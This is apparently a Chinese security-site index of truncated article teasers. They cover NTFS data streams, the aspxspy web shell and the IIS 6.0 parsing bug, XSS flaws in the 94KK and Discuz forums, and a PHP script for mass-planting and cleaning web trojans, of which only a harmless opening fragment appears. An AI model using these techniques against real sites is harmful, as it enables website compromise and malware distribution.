-
数据流0day
记:首先作为我,gxm,很荣幸的与咔咔在23号的早上凌晨2点多共同研究了流数据这个课题。感谢咔咔的无私奉献。技术共享。才让这数据流充分发挥他的力量。一,原理首先说下,NTFS文件系统里存在数据流,这是N久以前的了。NTFS分区的数据流是一个...
-
屏蔽iisspy及iis6.0解析bug
如果你的服务器支持.NET那就要注意了,aspxspy的网页有个功能叫:IIS Spy,点击以后可以看到所有站点所在的物理路径。一般设置单用户权限即可屏蔽,但是有时不管事,仔细看看他的利用方法,不过如此,我们也可以做如下简单设置:&ldqu...
-
94KK论坛跨站漏洞
94KK论坛系统采用服务器缓存机制,以三层模式开发,周密严谨的编写算法,对比其它论坛,相同的数据库容量,94KK的执行速度是最快的,顾名思义,所以“94kk”也称为“就是快快”。安全放心的论坛...
-
Discuz7.0.0 Flash Xss 老漏洞新想法
今天去DZ的官网看了一下,已经无法上传jpg后缀的swf文件了,但是大家注意到了么,和DZ配套的ucenter空间的相册,是可以上传jpg后缀的swf文件的。于是我下载了最新版本的DZ7.0以及ucenter和ucenter空间,测试后果然...
-
批量挂马和批量清马程序PHP版
<?phpfunction gmfun($path=”.”){$d = @dir($path);while(false !== ($v = $d->read())) {if($v == “....
